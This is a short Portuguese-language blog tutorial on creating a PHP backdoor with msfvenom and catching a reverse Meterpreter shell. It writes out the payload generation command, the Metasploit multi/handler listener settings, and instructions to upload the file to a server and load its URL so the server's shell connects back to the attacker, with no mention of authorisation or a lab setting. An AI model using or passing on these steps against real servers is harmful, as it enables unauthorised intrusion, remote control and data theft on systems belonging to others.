Criar um Backdoor em PHP e Pegar shell Meterpreter
Criar o Backdoor:
$ msfvenom -p php/meterpreter/reverse_tcp lhost=seu-ip lport=sua-porta > nome.phpEscutar o Backdoor:
$ msfconsole$ use multi/handler
$ set lhost seu-ip
$ set lport sua-porta
$ exploit
Depois do Comando "exploit" o seu backdoor ficará em escuta...
Upload do Backdoor:
Depois que você fazer o upload do backdoor no Servidor, você vai ter que ir na URL do arquivo e apertar "Enter" para que o PHP Malicioso seja executado no servidor e assim cair a shell no seu Metasploit...[ ! ] Assim que você clicar na URL do Backdoor, a shell do servidor irá subir no seu meterpreter.
Tutorial:
![[TERMINAL] - SABER LOCALIZAÇÃO DE IP EM TEMPO REAL](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkYANksBGO11LZNydoXSs9Eu1MxvWJY9YzTS5g37hGRFNgtkmHIQmyb1yOYwimcaH3t5ImogpheksnHFYsB_xFQghv2ZyQV3PZ_JIFsLV0GPJs4cgO8I7AMfsxRTXXkk5U1g0G8hGcFkrS/w72-h72-p-k-no-nu/857109_1.jpg)
![[Terminal] - Comandos para baixar o PentBox](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioZaYTjXeKNyXer38slFZzT09ok1nAGJPf9TfeJdFN1twX_i9PXK55l9OeAaw0byq7lQMXPNySrnpqtOztQwRPC2IwtFAvGKr2tyU6DrajTeGCmdhChZmG1n2fofh7hyphenhyphenaUHI2WDm-sITX1/w72-h72-p-k-no-nu/Honeypot_Diagram_pskp38.png)
![[Terminal] - Comandos do Hakku-Framework](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMYxGqICPecPCy_PJ_hHYOxcKkvmqYf1d838sGFskLvaEomW327sBr1mtqGnD3m0FGDGQQREx8l4FPNcRVb8MfG_PzIkh1x1aKwd-JUygpyo4Qhhy87A9RHbqbmbLyViG9a3karn8VrVgt/w72-h72-p-k-no-nu/site.PNG)